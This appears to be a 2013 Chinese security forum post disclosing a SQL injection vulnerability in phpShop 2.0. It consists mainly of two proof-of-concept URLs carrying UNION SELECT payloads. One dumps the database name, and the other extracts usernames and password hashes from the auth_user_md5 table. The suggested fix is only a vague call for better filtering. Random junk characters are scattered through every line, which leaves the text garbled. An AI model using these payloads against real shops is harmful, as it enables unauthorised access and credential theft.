标题 : phpshop 2.0 SQL Injection Vulnerability9 y1 h+ J0 [* L3 w
, g' Y! e# V z4 m5 d1 |
作者 : By onestree J6 g" q7 P. H' L
下载地址 : http://code.google.com/p/phpshop/downloads/list# }% C- T2 x& b3 }* N2 L, h' s
测试地址: windows 7 / ubuntu$ H" G4 [9 J7 ~0 S7 U
. a2 ~& k. @. ]! c1 f5 W7 p, b 5 u3 _% x5 y+ I
SQLi p0c:$ N) y/ D% w0 k2 k
5 t7 _% |1 a6 j' ?3 a==================
5 ^1 ]# u/ W2 E) q
) s* L# ] \2 W4 Q! l' fhttp://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'
; X) K: ~& A& U, Gunion select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --
% x1 @. x; e" v
- n7 n, _1 g+ v5 ahttp://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--
5 T% b5 A, ?5 j' M# }8 O2 \; c+ i1 I) s9 I8 n! M& z
修复:
5 F7 L s) a7 a; L加强过滤( U# }: q5 C$ m" H
8 a7 t% V9 C! x/ S7 @
$ v. d# m& p0 M. s: F# u |
发表于 2013-1-18 18:24:10
收藏
支持
反对